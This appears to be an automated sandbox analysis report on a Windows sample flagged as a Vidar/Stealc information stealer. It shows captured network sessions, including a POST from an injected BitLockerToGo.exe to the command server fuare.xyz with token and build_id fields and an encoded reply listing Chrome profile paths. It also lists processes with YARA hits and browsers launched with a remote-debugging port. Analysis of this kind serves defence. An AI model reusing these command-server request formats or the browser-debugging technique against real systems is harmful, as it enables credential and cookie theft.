                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 36 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 65 64 69 61 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 65 64 69
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702651" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Media.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenMedi


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                        148192.168.2.54985513.107.246.45443
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC192OUTGET /rules/rule700900v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:46 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 1371
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
                                                                                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BED3D048D"
                                                                                                                                                                                                                                                                                                                                                        x-ms-request-id: 5a9e749e-101e-000b-39d2-2c5e5c000000
                                                                                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                        x-azure-ref: 20241114T142546Z-16547b76f7fknvdnhC1DFWxnys0000000kq000000000mxb0
                                                                                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC1371INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                        149192.168.2.549854116.203.0.1594436152C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC316OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                        Content-Type: multipart/form-data; boundary=----IJDHCBGHJEGHJJKFHIIE
                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                                                        Host: fuare.xyz
                                                                                                                                                                                                                                                                                                                                                        Content-Length: 331
                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:46 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 48 43 42 47 48 4a 45 47 48 4a 4a 4b 46 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 37 62 31 36 31 66 36 66 38 62 35 30 36 38 66 61 35 66 63 34 39 31 64 62 63 38 63 66 32 36 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 43 42 47 48 4a 45 47 48 4a 4a 4b 46 48 49 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 37 35 33 36 61 33 38 64 33 37 30 37 62 36 36 30 30 66 32 38 62 39 64 37 31 37 37 61 31 32 63 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 48 43 42 47 48 4a 45 47 48 4a 4a 4b 46 48 49 49 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: ------IJDHCBGHJEGHJJKFHIIEContent-Disposition: form-data; name="token"67b161f6f8b5068fa5fc491dbc8cf261------IJDHCBGHJEGHJJKFHIIEContent-Disposition: form-data; name="build_id"27536a38d3707b6600f28b9d7177a12c------IJDHCBGHJEGHJJKFHIIECont
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:47 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                        Date: Thu, 14 Nov 2024 14:25:47 GMT
                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                        2024-11-14 14:25:47 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                                                                                                        Start time:09:24:57
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\S0FTWARE.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\S0FTWARE.exe"
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x480000
                                                                                                                                                                                                                                                                                                                                                        File size:26'859'520 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:BAE4CCAA9AA2B36270938DDE45D069BE
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2190648021.0000000013764000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2247474253.0000000013A80000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2190577336.00000000137EE000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2247124098.000000001376C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000002.2246493920.00000000133E8000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000003.2190543178.0000000013800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000000.00000003.2192615630.00000000133E8000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2247358214.0000000013A5C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2246493920.0000000013471000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2190136482.000000001387E000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2247221901.0000000013880000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                                                                                                                        Start time:09:25:16
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x570000
                                                                                                                                                                                                                                                                                                                                                        File size:231'736 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.3358442703.0000000002E88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.3357757392.0000000002AA8000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000003.00000002.3357729051.0000000002A31000.00000002.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                                                                                                        Start time:09:25:58
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                                                                                                                        Start time:09:25:59
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:7
                                                                                                                                                                                                                                                                                                                                                        Start time:09:25:59
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 --field-trial-handle=2324,i,17997273353640924679,7727149592954305312,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                                                                                                                        File size:3'242'272 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:9
                                                                                                                                                                                                                                                                                                                                                        Start time:09:26:10
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:10
                                                                                                                                                                                                                                                                                                                                                        Start time:09:26:11
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                                                                                                                                                        Start time:09:26:11
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2732 --field-trial-handle=2600,i,17974872305379590479,9492562084942244494,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                                                                                                                                                        Start time:09:26:12
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2728 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                                                                                                                                                        Start time:09:26:12
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                                                                                                                                                                        File size:55'320 bytes
                                                                                                                                                                                                                                                                                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                                                                                                                                                        Start time:09:26:15
                                                                                                                                                                                                                                                                                                                                                        Start date:14/11/2024
                                                                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6720 --field-trial-handle=2544,i,2895692631487973733,12792886755276360838,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
